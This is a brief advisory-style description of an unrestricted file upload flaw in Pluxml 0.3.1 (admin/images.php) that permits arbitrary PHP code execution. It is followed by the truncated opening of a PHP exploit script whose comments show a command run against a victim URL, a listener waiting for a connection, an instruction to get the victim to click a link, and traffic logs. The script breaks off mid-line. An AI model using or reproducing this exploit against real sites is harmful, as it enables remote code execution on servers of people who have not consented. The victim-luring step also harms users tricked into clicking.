Unrestricted file upload vulnerability in admin/images.php in Pluxml 0.3.1 allows remote malicious users to upload and execute arbitrary PHP code via a .jpg filename.
<?php
# C:\> sploitphp -url victimcom/pluxml031/ -ip 902710196
# [/]Waiting for connection on 902710196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 18226542:2007
# [+]Sending 366 bytes to 18226542:2007
# [+]Received 326 bytes from 18226542:2009
# [+]Sending 366 byt ...